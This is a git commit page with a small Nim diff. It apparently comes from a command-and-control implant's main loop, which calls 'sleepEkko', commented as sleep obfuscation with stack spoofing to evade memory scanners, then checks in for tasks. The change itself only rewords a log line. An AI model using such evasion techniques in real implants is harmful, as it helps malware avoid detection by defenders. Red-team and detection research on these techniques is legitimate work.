Decided against implementing additional heap obfuscation for Ekko, due to no sensitive data being allocated in heap memory.

This commit is contained in:
Jakob Friedl
2025-08-28 12:47:37 +02:00
parent f81933e479
commit e1ea085a0d
2 changed files with 14 additions and 10 deletions

View File

@@ -35,10 +35,11 @@ proc main() =
while true:
# Sleep obfuscation with stack spoofing to evade memory scanners
sleepEkko(ctx.sleep * 1000)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
echo fmt"[{date}] Checking in."
echo "\n", fmt"[*] [{date}] Checking in."
try:
# Retrieve task queue for the current agent by sending a check-in/heartbeat request